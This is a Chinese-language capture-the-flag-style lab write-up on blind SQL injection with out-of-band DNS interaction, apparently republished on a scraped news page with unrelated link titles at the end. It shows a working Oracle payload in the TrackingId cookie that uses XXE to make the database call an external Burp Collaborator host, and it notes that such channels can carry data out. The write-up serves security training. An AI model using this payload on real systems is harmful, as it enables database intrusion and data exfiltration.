当前位置: 首页 > news >正文

人力资源网站/技能培训学校

人力资源网站,技能培训学校,可信网站必须做吗,网络服务协议模板文章目录 前言:进入实验室构造 payload 前言: 实验室标题为: 带外交互的 SQL 盲注 简介: 本实验包含一个SQL盲目注入漏洞。应用程序使用跟踪Cookie进行分析,并执行包含提交的Cookie值的SQL查询。 SQL查询是异步执…

文章目录

  • 前言:
  • 进入实验室
  • 构造 payload

前言:

实验室标题为:

带外交互的 SQL 盲注

简介:

本实验包含一个SQL盲目注入漏洞。应用程序使用跟踪Cookie进行分析,并执行包含提交的Cookie值的SQL查询。

SQL查询是异步执行的,对应用程序的响应没有影响。但是,您可以触发与外部域的带外交互。

要解决这个实验,利用SQL注入漏洞导致DNS查找Burp Collaborator。

注意

为了防止Academy平台被用于攻击第三方,我们的防火墙阻止了实验室与任意外部系统之间的交互。要解决实验,您必须使用Burp Collaborator的默认公共服务器。

提示:

你可以在我们的SQL注入备忘单上找到一些有用的有效载荷。

进入实验室

仍然是一个商店页面

构造 payload

在本关主要目的是体验 OOB(DNS 带外),DNS 外带的核心是让盲注变为显错注入,在无法利用漏洞获得回显的情况下,目标可以发起请求,这个时候就可以通关 DNS 请求把想获得的数据外带出来

依旧是使用 burp 进行抓包注入

利用 union 联合查询结合 xml 外部实体攻击(XXE)来构造 payload

TrackingId=x' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://1prcgeu2pgeoycglrzqok5dsxj3ar2fr.oastify.com/"> %remote;]>'),'/l') FROM dual--

extractvalue()函数是 Oracle 数据库的 XML 函数,用于从 XML 片段中提取值

xmltype()构造是将字符串转换为 Oracle 的 XMLtype 对象,强制解析 XML 内容

打开 burp 中的 Collaborator,复制链接

将 payload 粘贴在 cookie 后面,并进行 url 编码

返回 Collaborator 模块,点击 Poll now,可以看到返回四个域名,以及对应的源 ip 地址

返回商店页面,可以看到通关提示

http://www.whsansanxincailiao.cn/news/30720954.html

相关文章:

  • 网站建设pad版本是什么/三只松鼠有趣的软文
  • 网站建设ASP心得体会/友情连接出售
  • 做图标得英文网站/站长工具seo综合查询降级
  • 许昌市住房和城乡建设厅网站/搜索引擎优化实验报告
  • 图片素材网站建设/搜索引擎排名竞价
  • 怎么做网站教程html文本文档/网页制作培训网站
  • 沈阳疫情最新数据消息/神马seo教程
  • 网站首页焦点图/百度seo排名在线点击器
  • 深圳网站开发报价/百度智能建站系统
  • 网站制作相关知识/服务营销理论
  • 免费服务器建站/免费发布信息网站大全
  • 图标设计免费 logo/优化网站首页
  • 熊掌号做网站推广的注意事项/十大免费网站推广
  • 网站主办者是什么意思/广州代运营公司有哪些
  • 做响应式网站最大宽度/青岛网站优化公司哪家好
  • 淮北市做网站最好的公司/郑州做网站
  • 建网站的网络公司/微信营销工具
  • wordpress设置2个网站/培训机构退费法律规定
  • 外贸网站建设推广公司/sem代运营公司
  • python如何建网站建设/互联网下的网络营销
  • 深圳自建站网站/资讯门户类网站有哪些
  • wordpress防伪查询主题/谷歌seo详细教学
  • grace 7 wordpress/seo公司官网
  • 怎样做下载网站/网站开发是做什么的
  • 电脑版传奇网站/今日大事件新闻
  • 北京网站建设方案飞沐/百度域名注册官网
  • 国庆图片制作小程序/百度网站排名优化价格
  • 模仿网站怎么防止侵权/优化20条措施
  • 上海 科技网站建设/百度搜索工具
  • b2c模式名词解释/seo是一种利用搜索引擎